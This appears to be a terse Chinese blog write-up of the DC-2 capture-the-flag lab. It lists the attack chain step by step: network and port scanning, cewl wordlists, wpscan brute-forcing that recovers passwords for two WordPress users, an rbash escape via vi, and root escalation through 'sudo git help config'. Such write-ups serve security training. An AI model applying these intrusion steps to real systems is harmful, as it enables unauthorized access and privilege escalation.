DC-2
扫描局域网内所有设备
arp-scan -l
nmap -p- -sV 扫描所有端口
只能改hosts文件进去
用awvs扫一下(awvs yyds!)
可是好像msf没有收录这些漏洞
flag提示用cewl
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件
cewl http://dc-2 -w 1.txt
nikto工具扫描后台
nikto -host http://192.168.xx.xx (默认扫描80端口)
wpscan(kali中针对wordpress的漏洞扫描工具)
wpscan --url http://www.xxxxx.wiki/
admin jerry tom
$ wpscan --url http://dc-2 -U /home/t123/桌面/user.txt -P /home/t123/桌面/cewl.txt //不知道路径可以用pwd看看
@H_404_91@
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
登录,查看到flag2
ssh链接后rbash
如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受
限
绕过rbash
compgen -c //查看当前用户可执行命名,发现有vi
vi编辑器绕过
在命令行中,输入 vi,在末行模式中,输入 :set shell=/bin/bash在这里插入代码片
这里就直接将shell设置为/bin/bash
接着在执行命令 :shell
就好了
然后就有一个无限制的shell了
绕过rbash
git提权
sudo git help config
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。